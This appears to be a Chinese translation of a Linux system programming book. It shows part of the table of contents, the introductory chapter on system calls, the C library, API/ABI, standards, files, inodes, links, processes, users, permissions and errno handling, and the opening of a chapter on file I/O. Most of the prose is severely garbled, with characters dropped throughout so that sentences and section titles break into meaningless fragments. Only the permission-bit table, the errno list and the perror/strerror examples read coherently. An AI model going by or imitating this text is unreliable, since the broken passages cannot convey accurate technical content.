9.1.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
9.1.2 Linux 的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
9.2 理. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
9.2.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305
9.2.2 子. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 306
9.2.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309
9.2.4 映射 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310
9.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 311
9.3.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 311
9.3.2 子. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312
9.3.3 给自 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312
9.3.4 给进程 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
9.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
9.4.1 的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
9.5 集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
9.5.1 更的集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
9.6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317
9.6.1 处理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 318
9.6.2 集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 318
9.7 理. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 319
9.7.1 siginfo t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
9.7.2 si code 的世. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 323
9.8 的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325
9.8.1 子. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326
9.9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326
第 10 章 时间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 328
10.1时间的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330
10.1.1 原示. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330
10.1.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
10.1.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
10.1.4 时间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 332
10.1.5 进程时间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 333
10.2POSIX 时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 333
10.3时间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334
10.4时间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 335
10.4.1 更的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
10.4.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 337
10.4.3 进程时间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
10.5设时间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 339
10.5.1 时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
10.5.2 设时间的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
10.6时间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341
10.7调校时. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
10.8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
10.8.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
10.8.2 Linux 的实时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
10.8.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
10.8.4 实的方 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
10.8.5 sleep 的实 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353
10.8.6 超. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353
10.8.7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354
10.9时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354
10.9.1 单的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354
10.9.2 间时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
10.9.3 时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358
10.9.4 设时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
附录 A GCC 对 C 语言的扩展 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
A.1 GNU C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
A.2 内. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
A.3 内. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 366
A.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 367
A.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
A.6 的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
A.7 内存的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
A.8 调 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369
A.9 将 deprecated . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369
A.10将 used. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
A.11将或 unused. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
A.12将进(pack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
A.13的内存对 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
A.14将存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
A.15. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
A.16式的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 373
A.17的内存对. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374
A.18的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
A.19. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
A.20 Case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 376
A.21void 的操作 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377
A.22更更的性 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377
附录 B
参考书目 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
B.1 C 程设的相 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
B.2 Linux 程的相. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
B.3 Linux 内的相. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
B.4 操作设的相 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 382
第 1 章
简介和主要概念
的程的将写
件的相。件的内
进。的件 shell、文、、调、工
(: 即 GNU Core Utilities, GNU 的工集我
们的) 进程。程内 C 以
” ” 件。件( (high-level)GUI 程
更的们。程
的时间写件。理程
程。作的更
的程我们写的件的。
的 Linux 上的程的。 Linux Linus Torvalds
内散的写的 Unix 操作。 Linux Unix
同的理 Linux Unix Linux 自的原方方
的实能的。的 Linux 程的内
何的 Unix 的。然内 Linux 相
的 Unix 自出的 Linux 的新的调
同的新性。
1.1 系统编程
的的 Unix 程程。
上 Unix 的 X Window 上进工作
时我们的 Unix API。以上
Linux 程设的。然程的 – 何
make 的 Linux 上的程的 API。
们程程相们同同。
程出的程对工作的的件操作
的然们调上的。写的
的上上相的内。的
程程程 (或相), 件的。
离的程的然的
的方式的程同。
我们 web 件( Javascript
PHP( C# 或 Java程离程
更的展。然展示程的。实
上写 Javascript C#
程。更进步 PHP Java 程然以程同
理内的能何写出更的。
程的展的 Unix Linux 的程然
程 C C 内提的。的
程 Apache、 bash、 cp、 Emacs、 init、 gcc、 gdb、 glibc、 ls、 mv、 vim
X时的。
程的内或设备的内
。程的将内。将
内上的内(内对空间
程。同程以及相的内展
。设备程程的
。
我 Linux 上写程内
C 提我何 Linux 设小相
Unix Linux 提的调们何工作的
将的。
程调 C C 的
。
1.1.1 系统调用
程调。调(写 syscalls操作
或空间文内
(的的调。调我们的 read()
write() 的 get thread area() set tid address()。
Linux 实的调操作。 i386
的调 300 相的 Windows 上。
Linux 的内( Alpha i386 PowerPC) 实自的
调。同间的调存的。然 90% 以
上调的上实。上的的
内。
1.1.2 调用系统调用
空间程能内。的
空间程内的或操作内。相内提
空间程能内调调
。程能内内
的。同的相同 i386 上空间程
0x80 的 int将内
的内处理的 0x80 的处理
的调处理。
程存内调。
调 0 。 i386 上调 5(
open()空间程 int 将 5 写 eax 存。
的方式进处理。以 i386 存
能的存 ebx、 ecx、 edx、 esi edi 存 5 。对
的超 5 的调的存空间存
的存即。然调的。
处理调的方式同的的。作
程内处理调的。内
的调的 C 自处理。
1.1.3 C 库
C (libc Unix 程的。的 C
的的提或方的
调。的 Linux C GNU libc 提 glibc
[gee-lib-see] 或更 [glib-see].
GNU C 提超展示的内。的 C glibc 提
调程工。
1.1.4 C 编译器
Linux 的 C GNU 工集(gcc。原 gcc
GNU 的 cc C 。 GCC 示 GNU C Compiler。
的进。时 gcc GNU 的。然
gcc 调 C 我 gcc 的时
上文的 gcc 程。
实 C (”C ”) 的 ABI(”APIs
ABIs” ) Unix ( Linux ) 的程的
。
1.2 API 和 ABI
将程们们写的程以提
的上。们们自的 Linux 上的程能
的 Linux 同时以 Linux 的更新的
Linux 上。
性的相的集
程(API程进(ABI
件同间的。
1.2.1 API
API 件间的。提
(以的方式) 的方式进: 程段(的
以调程段(。
上示文的 API 能对示文提
的。 API 我们的API实对 API 的实。
们 API 理的
上 API 。 API 的 (件) 给 API 的
实提何实内能的子或
或。 API 的件同的 API
时。 API API 的实上能。
实的子 API C C 实 API
的处理。
我们及 API的 IO。 Linux
程的 API 将的。
1.2.2 ABI
API ABI 的的上或
件间的进。何自何内
以及进。 ABI 进段能
何同 ABI 的上作新。
ABI 的调、、存、调、
、进式。以调何调
何存以及调何提的
。
同的操作( i386 上的 Unix 操作
的 ABI然效。相 Linux
内的操作自的 ABI ABI 相。
的 ABI 及的的存或。 Linux
自的 ABI 集实上我们以的
ABI alpha x86-64 。
程 ABI 的。 ABI
上的工(tooltrain、。
ABI 的相内以写出更的写或
工时的绝(实程。
我们以上 Linux 上的工内实的 ABI
。
1.3 标准
Unix 程的 Unix 程。
Unix 的。性。
的世将方。
的上 Linux 们。 Linux
的 POSIX Single Unix Specification(SUS)
内 POSIX SUS Unix 操作上的 C API
们效的的 Unix 程出
的 API 集。
1.3.1 POSIX 和 SUS 的历史
1980 子工程(IEEE Unix 的
的相工作。自件(Free Software Movement的
Richard Stallman POSIX ( pahz-icks
Portable Operating System Interface(操作。
1988 IEEE std 1003.1-1988(
POSIX1988 。 1990 IEEE POSIX IEEE std 1003.1-
1990(POSIX1990。性的实时程 IEEE Std 1003.1b-1993
(POSIX 1993 or POSIX.1b) IEEE Std 1003.1c-1995(POSIX 1995 or POSIX.1c) 式
文。 2001 性 POSIX1990 的上单的
IEEE Std 1003.1-2001 (POSIX 2001)。新的 IEEE Std 1003.1-2004 布
2004 4 的 POSIX POSIX.1以 2004 新
。
1980 1990 Unix 的”Unix ”
处的将自的 Unix ”Unix”。的
Unix Open Software Foundation(OSF X/Open 工业
-The Open Group。 The Open Group 提、。 1990
Unix 的时 The Open Group 布单 UNIX
(Single UNIX Specification SUS。相的 POSIX SUS
的。 SUS 新的 POSIX 。
的 SUS 布 1994 SUSv1 的 Unix 95.
的 SUS 布 1997 相的 UNIX 98. 的
SUS新的 SUS,SUSv3 布 2002 的 Unix 03.SUSv3
IEEE Std 1003.1-2001 。我将
POSIX 的调提及。我将提及 POSIX SUS
( SUS POSIX.1 的超集
的扩展的 POSIX.1 提的能 –APUE S2.2.3。
1.3.2 C 语言标准
Dennis Ritchie Brian Kernighan 的作C 程设 (Prentice
Hall) 自 1978 出式的 C 的。
的 C K&R C。 C 的 Basic 程的
。对时相的进
(ANSI 1983 方的 C
进新的性同时 C++ 的。
程 ANSI C 1989 。 1990
(ISO ANSI C 进 ISO C90。
1995 ISO 布新(然 ISO
C95。 1999 的 ISO C99 更新的内进新的
inline 、新、、 C++ 新的。
1.3.3 Linux 和标准
Linux POSIX 以及 SUS 提 SUSv3 POSIX.1
的的实时(POSIX.1b) 程 (POSIX.1c) 。更的
Linux 提 POSIX SUS 的。满
的即 bug。 Linux POSIX.1 SUSv3 实的
POSIX 或 SUS 方( Linux 的以我式
布 Linux POSIX 或 SUS 的。
Linux gcc C ISO C99 gcc 提
C 的扩展扩展 GNU C。相。
Linux 的的子。 C
的将的。进
以的 glibc 。 gcc 扩展对新的 gcc
布 C gcc 将的的 C
程。的 Linux 内调的调 Linux 内
的上实。
同的 Linux 布 Linux (LSB。
LSB Linux (自 [Free Standard Group])
的。 LSB 扩展 POSIX SUS自的。
提进即的上。
Linux 程上 LSB 。
1.3.4 本书和标准
何的空。时 Unix 程
对同的的进给的调
上实进。及新的 2.6 内
、 gcc 4.2 C (2.5的 Linux 上的进程的相。
的 (Linux 内小处理以
调) 同时提程上进的性
方式我们 Linux 的时 Unix 的
性。将的 Linux 上以的
将的 Linux 。 Linux 的相
gcc内的实。我们以业的实能
。
1.4 Linux 编程概念
展 Linux 提的的。的 Unix
Linux 提同的集。实上
同 Unix。对文件进程的、理的
Unix 的内。
Linux 以 shell
单的 C 程。 Linux 的 Linux 程的内
进 Linux 程的的。
1.4.1 文件和文件系统
文件 Linux 的。 Linux 文件的理(
然 Plan9。的工作
读写文件的的文件。
文件能。文件以以读方式或写方式或
。的文件的文件进
文件的的映射。 Linux 内文件
示(C 的 int写 fd。文件
空间程文件文件。的 Linux
程对文件的操作。
1.4.2 普通文件
我们的文件 Linux 的文件。文件以
性方式的。 Linux 文件更进
步的或式。以何以以何方式
文件 Linux 文件的。
操作 VMS提的文件的。 Linux
的处理。
文件的何以读或写操作的
文件的的。文件或文件。
文件内的文件的的。文
件时 0。对文件的读写操作 (进)文件的
。文件的以工超
文件的。超文件写将间的 0。
以的方式文件的写文件的
写。上实上处。文件
0能。文件间写将上的。
间写内扩展文件的文件写操作文件的
文件的存的 C 的小新的
的 Linux 上 64 。
文件的小文件。文件文件的
性的。文件的以(truncation。
文件以文件小的文件。的
操作文件以原更的文件。文
件以0进(文件的。文件以空( 0
何。文件同文件的 Linux 内理
文件的 C 的小。然的文件能自的
将更小的。
同文件能同或相同的进程文件的
实提的文件。进程能文件同
进程。内对文件何同的进程能
同时对同文件进读写。的操作的
的。空间程调们自的以文件
以同步。
文件文件进实上对文件文件
。相文件 inode( inode 的进
。 inode (inode number)写 i-number 或 ino。
inode 存文件的的时间、、、以及文
件的的 – 文件。 inode Unix 文件上实
理对 Linux 内的的实。
1.4.3 目录和链接
inode 文件然的(的
。们文件文件。提文件
时的的将读的 inode 进映射。 inode 的
对(link。映射理上的式以单的、
或何式映射内对的文件实
理。上以何的文件的同
存 inode 的映射。内映射将文件 inode。
空间的文件时内文件的
然文件。内文件 inode 然 inode
对的 inode。 inode 文件相的文件
上的存。
上 /。我们的
上。内给的文件
同文件相实上们的
inode。内的能的的 inode。以
的。 Unix 的
文件 /home/blackbeard/landscaping.txt.
内的时上的(directory
entry内 dentry的 inode。的子内
/ home 的 inode然 blackbeard 的 inode进
landscaping.txt 的 inode。操作程或。内
存( dentry cache存的提时间性
。时间性我们将。
的(fully qualified的绝对
。的相们相对(
todo/plunder)。相对。相对时内的工作
进。工作内 todo
内 plunder 的 inode。
然以的文件内操作文件
操作们。相们的调操作们
调进操作。
空间内的理进操作单的能
文件。
1.4.4 硬链接
上何内及同
inode 上。实上以的。我们将同映射同 indoe
的。
的文件相同的。
以同以同的内
以将的上。 /home/bluebeard/map.txt
/home/blackbeard/treasure.txt 以的 inode 上。
的文件将 unlink 操作操作将文件
inode 的映射。然 Linux 文件能
unlink 操作 inode 以及的。文件的
方存? 文件的
文件 inode (link count) 文件
文件的。将 1。 0 的时
inode 的真的文件。
1.4.5 符号链接
inode 自文件何以能文件
。文件 Unix 实(
symlinks。
上文件 symlink 自的 inode
文件的。以何方同文
件上的文件存的文件。存文件的
。
相更。效的
文件的文件。的
或进文件的文件何。的
的然的。
相的性。的实
操作出文件。操作
的调。作文件的方式文件内
时性的的。
1.4.6 特殊文件
文件以文件方式示的内对。以 Unix
同的文件 Linux 的文件设备文件、设备文
件、 Unix 。文件将文件的方
文件理的实。 Linux 提文件的调。
对 Unix 的设备进设备文件实设备文件的
文件的文件。设备文件以、读写以
空间程操作上的(理的设备。 Unix 的设备
设备设备。设备自的设备文件。
设备同性。设备程将写
空间程写的进读。的
设备。”peg”程将设备读 p然 e
g。更的读时设备 end-of-file(EOF。读
或以何的读。设备设备文件 (character
– 12 –
1
device file) 进。
相设备同以的方式进。设备将
映射的设备上空间以自的以何的
何以读 12 7 然读 12。设备存设
备、、、 CD-ROM 存的设备们设备
文件 (block device files) 进。
( FIFOs进出的以文件
的进程间 (IPC) 文件进。将
程的出以的方式给程程的。们
调内存何文件存。
文件进。 FIFO 文件相的进程以
文件进。
的文件。进程间的
式同进程进同同以。实
上程的。们出 Unix
进的式。相上的
对的 Unix 文件上的文
件进文件文件。
1.4.7 文件系统和名字空间
同的 Unix Linux 提的文件的
空间。操作将的空间。
上的文件能 A:\plank.jpg 文件进 C:\。 Unix
同上的文件 /media/floppy/plank.jpg 或 /home/captain/stuff/-
plank.jpg 的文件同空间的。
Unix 的空间的。
文件以的文件的集。文件能
的文件的空间的。操作(mounting
(unmounting)。文件空间的
。文件的以。 CD
/media/cdrom然以 CD 上的文件的
。的文件空间的 /文件。 Linux
文件。的的文件
。
文件存理上的(存上同时 Linux
存内存上的文件的文件。理文件
存 CD、 、 存 或 存 设 备。 设 备
的们以操作的文件。 Linux
的文件 (的文件)文
件(media-specific filesystems( ISO9660文件(NFS原
文件(ext3 Unix 的文件(XFS以及 Unix 文件
(FAT。
设备小单设备的理单。
2 的 512 。设备或更小的单
。的 I/O 操作或上。
同文件小的单文件的
对理的 2 的小的。
的小小页的小(小的内存理单件
件。小 512B 1KB 4KB。
的 Unix 单空间上的进程
。 Linux 进程的空间进程
文件的。子进程进程的
空间进程以的自
的空间。
1.4.8 进程
文件 Unix 的进程文件。进程
的的、存的、的程。进程
、、以及的。
进程周。内能
的式(Linux 的式 ELF以。
式段。段性内存的性
。段内的将同相同的同
的的。
的段段段 bss 段。段
读读。段的
的 C 读写的。 bss 段的
C C 的 0上的
存 0。相以单的 bss 段的内
将映射 0 页( 0 的内存页进内存的段性能们设
bss 段。 block started by symbol或 block
storage segment 的写。 ELF 的段绝对段(absolut
section(段(。
进程内理的进程的
操作能调。时、文件
件进程。进程的进程相的存
内进程的进程。
进程的。 Linux 内式内存给进
程提处理内存的。进程的进程
。给的进程的进程调
。将的新进进程调将的处理
进程进程。的进程的
性空间内存。内存页调内
进程存上进程操作自的空间。内
处理的件理操作能理
的进程。
1.4.9 线程
进程或程(程程进程的
单。程进程的。
进程程们单程的(single-thread
程的进程程的(multithreaded。上 Unix
、进程时间、的进程对程
的。以 Unix 程单程。
程(同程上的进程存)、处
理、的(处理的。进程的
程。
Linux 内实的程们然的(
空间进程。空间 Linux POSIX1003.1c
实程(pthread。 Linux 程实的 Native POSIX Threading Li-
brary(NPTL glibc 的。
1.4.10 进程体系
进程的即进程 ID(pid。进程的
pid 1进程新的的 pid。
Linux 进程的的进程。进
程以进程 init 进程 ( init(8程) 。新进程
fork(调。 fork(调进程原进程进程新进
程子进程。进程进程进程。进程
子进程内将 init 进程的进程。
进程即。相内将内存存
进程的内进程进程的进程
。进程的的子进程子进程的。
进程进程的进程 (zombie)。 init 进
程的子进程的子进程处。
1.4.11 用户和组
Linux 进。的
ID(uid。进程 ID 进程的
进程的真实 uid(real uid)。 Linux 内 uid 的。
id 自或。们
对的 id 存 /etc/passwd 程将映射相的 uid 上。
的程 login(1) 程提。提的
login(1) 程将 /etc/passwd shell(login
shell)将 id 作进程的 uid。子进程进程的 uid。
uid 0 超 root 的 id。超何的
root 进程的 uid。 login(1) 的超理。
真实 UID(real uid) 进程效 UID(effective uid)
– 16 –
1
uid(saved uid) 文件 uid(filesystem uid)。真实 UID(real uid) 进
程的效 UID(effective uid) 以进程的
uid(saved uid) 存原的效 UID(effective uid)的将
效 UID(effective uid) 。文件 uid 效 UID(effective uid) 相
文件的。
属或 /etc/passwd 的
(primary group或(login group能 /etc/group
。 进 程 ID(gid) 真 实 gid(real gid) 效
gid(effective gid) gid(saved gid) 以及文件 gid(filesystem gid)。进程
。
进程满时能进操作。的
Unix 的原单 uid 0 的进程以的的进程
。 Linux 更效率的的单
的方式内进更的设。
1.4.12 权限
Linux 上的文件 Unix 。
文件属以及集。
、属以及对文件进读、写的。对
9 。文件存文件的 indoe 。
对文件然的们读文件写文件
文件的。然文件实读写的内文件自
文件上的读写文件的文件上
。的读的内出写新的
进行保存。表 1-1 列出了这 9 个权限位、它们的八进制值、文本表示方式(即 ls 所显示的形式)以及对应的权限含义。
表 1-1
Bit Octal value Text value Corresponding permission
8 400 r-------- Owner may read
7 200 -w------- Owner may write
6 100 --x------ Owner may execute
5 040 ---r----- Group may read
4 020 ----w---- Group may write
3 010 -----x--- Group may execute
2 004 ------r-- Everyone else may read
1 002 -------w- Everyone else may write
0 001 --------x Everyone else may execute
Unix 的 Linux (ACLs ACLs 更
、及理性存的。
1.4.13 信号
单异步能内进程能
进程进程或进程给自。进程件段
或 Ctrl+C。
Linux 内实 30 (实的
文示。 SIGHUP 示 i386 上
的 1.
SIGKILL(进程 SIGSTOP(进程进程能
的进。们以的处理操作能进
程、内存(coredump、进程或的
操作。进程以式的或处理。
将处理。处理将写的处理程将
时处理处理程将程给
原的程的处。
1.4.14 进程间通讯
进程的件操作的工作
。 Linux 内实的 Unix 的进程间(IPC System V
POSIX 同的以及 Linux 自的。
Linux 的进程间
内存空间(Futexes。
1.4.15 头文件
Linux 程离的文件。内 glibc 程提
文件。文件 C (,<string.h>以及 Unix 的献(
<unistd.h>。
1.4.16 错误处理
处理的。程
的示的 errno 。 glibc 对调
的 errno 提。提及的。
的( -1调
的。调提的原
errno 的原。
#include <errno.h>
extern int errno;
errno 的值只在出错函数返回错误指示值(通常是 -1)之后才有效,而任何成功的函数调用都可能修改它。
errno 以读写的(lvalue。 errno 的
的文对。处理 #define 同将 errno 映射相的
上。处理 EACCESS 1示 1-2 上
相的文。
Preprocessor define Description
E2BIG       参数列表太长
EACCESS     权限不足
EAGAIN      资源暂时不可用,请重试
EBADF       无效的文件描述符
EBUSY       设备或资源忙
ECHILD      没有子进程
EDOM        数学参数不在函数定义域内
EEXIST      文件已存在
EFAULT      地址无效
EFBIG       文件太大
EINTR       系统调用被中断
EINVAL      参数无效
EIO         发生 I/O 错误
EISDIR      是一个目录
EMFILE      打开的文件太多
EMLINK      链接太多
ENFILE      文件表溢出
ENODEV      没有这样的设备
ENOENT      没有这样的文件或目录
ENOEXEC     可执行文件格式错误
ENOMEM      内存不足
ENOSPC      设备上没有剩余空间
ENOTDIR     不是目录
ENOTTY      不合理的 I/O 控制操作
ENXIO       没有这样的设备或地址
EPERM       操作不被允许
EPIPE       管道损坏
ERANGE      结果超出范围
EROFS       只读文件系统
ESPIPE      非法定位 (seek) 操作
ESRCH       没有这样的进程
ETXTBSY     文本文件忙
EXDEV       不恰当的跨设备链接
C 提将 errno 对的文。
时的处理操作以处理
errno 进处理。
的 perror():
#include <stdio.h>
void perror(const char *str);
perror() 向 stderr(标准错误输出)打印一条信息:先是 str 指向的字符串,接着是一个冒号和空格,最后是当前 errno 所对应的错误描述。为使输出有意义,出错的函数调用之后应立即调用它,例如:
if (close (fd) == -1)
        perror ("close");
C 库还提供了 strerror() 和 strerror_r(),原型如下:
#include <string.h>
char * strerror (int errnum);
#include <string.h>
int strerror_r(int errnum, char *buf, size_t len);
strerror() 返回由 errnum 描述的错误对应的字符串。该字符串不能被修改,但后续的 perror() 和 strerror() 调用可能会改变它,因此它不是线程安全 (thread-safe) 的。
strerror_r() 则是线程安全的,它把错误描述写入 buf 指向的、长度为 len 的缓冲区。strerror_r() 成功时返回 0,失败时返回 -1,并相应地设置 errno。
errno 调设 0调进(真
时 0 。
errno = 0;
arg = strtoul (buf, NULL, 0);
if (errno)
perror (”strtoul”);
errno 的值只在刚刚出错的调用之后才有意义,中间再调用其他库函数就可能把它覆盖。比如下面的用法:
if (fsync (fd) == -1) {
        fprintf (stderr, "fsync failed!\n");
        if (errno == EIO)
                fprintf (stderr, "I/O error on %d!\n", fd);
}
如果中间还要调用其他函数,就应当先把 errno 的值保存下来:
if (fsync (fd) == -1) {
        int err = errno;
        fprintf (stderr, "fsync failed: %s\n", strerror (errno));
        if (err == EIO) {
                /* if the error is I/O-related, jump ship */
                fprintf (stderr, "I/O error on %d!\n", fd);
                exit (EXIT_FAILURE);
        }
}
的单程程 errno 。然
程程程自的 errno程的。
1.5 开始系统编程
Linux 程的展示程的 Linux 。
将文件 I/O。然读写文件然 Linux 实
文件相的文件 I/O文件的。
然的上的时进真
的程。们。
第 2 章
文件 I/O
文件读写的。操作 Unix 的。
将 C 的 I/O更的 I/O
。以文件操作文件 I/O 的。
对文件进读写操作文件。内进程
文件的文件 (file table)。文件
(file descriptors)(写作 fds的进。的
文件的文件备 inode 内存的
(文件式)。空间内空间文件作进
程的 cookies。文件文件的操作(读写
